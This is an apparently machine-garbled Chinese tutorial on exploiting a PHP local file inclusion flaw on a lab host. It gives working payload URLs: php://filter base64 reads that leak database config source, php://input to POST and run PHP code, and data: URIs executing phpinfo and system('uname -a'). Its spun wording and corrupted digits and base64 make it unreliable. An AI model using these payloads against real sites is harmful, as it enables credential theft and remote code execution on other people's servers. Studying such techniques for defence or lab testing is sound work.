php LFI讀php文件源碼以及間接post 網站shell

假如如下一個場景

(１) http://vulnerable/fileincl/example１.php?page=intro.php(該php文件包孕LFI漏洞)

(２) 然而你不有中央能夠upload你的網站shell代碼

(三) LFI只能讀取到非php文件的源碼(由于無奈解析履行 只能被爆菊花)

(4) 假如你能讀取到config.php之類文件 或批準以間接拿到數據庫賬號遠程入侵出來

【現在的標題問題是】?LFI如何讀取到php文件的源碼?

因而給大家做個演示?假如我正常用LFI去讀/sqli/db.php文件?是無奈讀取它的源碼?它會被當做php文件被履行

Default

http://vulnerable/fileincl/example１.php?page=../sqli/db.php

１

http://vulnerable/fileincl/example１.php?page=../sqli/db.php

然而假如我用老外文章里說提到的口頭?就能把指定php文件的源碼以base64方式編碼并被闡揚闡發出來

Default

http://vulnerable/fileincl/example１.php?page=php://filter/read=convert.base64-encode/resource=../sqli/db.php

１

http://vulnerable/fileincl/example１.php?page=php://filter/read=convert.base64-encode/resource=../sqli/db.php

/sqli/db.php源碼base64編碼后的模式闡揚闡發如下

Default

PD9waHAgCiAgJGxuayA9IG１5c三FsX２Nvbm5lY三QoImxvY２FsaG9zdCIsICJwZW50ZXN0ZXJsYWIiLCAicGVudGVzdGVybGFiIik七CiAgJGRiID0gbXlzcWxfc２VsZWN0X２RiKCdleGVyY２lzZXMnLCAkbG5rKTsKPz4K

１

PD9waHAgCiAgJGxuayA9IG１5c三FsX２Nvbm5lY三QoImxvY２FsaG9zdCIsICJwZW50ZXN0ZXJsYWIiLCAicGVudGVzdGVybGFiIik七CiAgJGRiID0gbXlzcWxfc２VsZWN0X２RiKCdleGVyY２lzZXMnLCAkbG5rKTsKPz4K

爾后我們再去停止base64解碼?解碼后/sqli/db.php文件的源碼一覽無遺

看下去彷佛很鋒利的容貌２三0;２三0;?然而?=_,=||~?再繼續看下文~

奸通奸騙*奸通奸騙*奸通奸騙*奸通奸騙*奸通奸騙?我是險峻的分割線?奸通奸騙*奸通奸騙*奸通奸騙*奸通奸騙*奸通奸騙

【身手】php://input?和?data:

php://input?概況能夠參考

http://zerofreak.blogspot.jp/２0１２/04/lfi-exploitation-via-phpinput-shelling.html

【前提】在allow_url_include?=?On?且?PHP?>=?5.２.0

【優勢】間接POST?php代碼并履行

【雞肋】在allow_url_include?=?On?傳說中就能夠間接RFI了?不過不有vps的童鞋能夠多么玩斗勁任意

在上面提到的同一個LFI漏洞點?我們又要來爆它一次菊花

Default

http://vulnerable/fileincl/example１.php?page=intro.php

１

http://vulnerable/fileincl/example１.php?page=intro.php

訪問如下URL并用burp間接批改HTTP包?追加php命令代碼

Default

http://vulnerable/fileincl/example１.php?page=php://input

１

http://vulnerable/fileincl/example１.php?page=php://input

爾后某君再一次被爆菊?>_

再換幾種姿態繼續??data:?的方式

Default

http://vulnerable/fileincl/example１.php?page=data://text/plain;base64,PD9waHBpbmZvKCk七Lyo=

http://vulnerable/fileincl/example１.php?page=data:;base64,PD9waHBpbmZvKCk七Lyo=

http://vulnerable/fileincl/example１.php?page=data:text/plain,<?php system("uname -a");?>

１２三

http://vulnerable/fileincl/example１.php?page=data://text/plain;base64,PD9waHBpbmZvKCk七Lyo=?? http://vulnerable/fileincl/example１.php?page=data:;base64,PD9waHBpbmZvKCk七Lyo=??http://vulnerable/fileincl/example１.php?page=data:text/plain,<?php system("uname -a");?>

[via@casperkid / ２cto]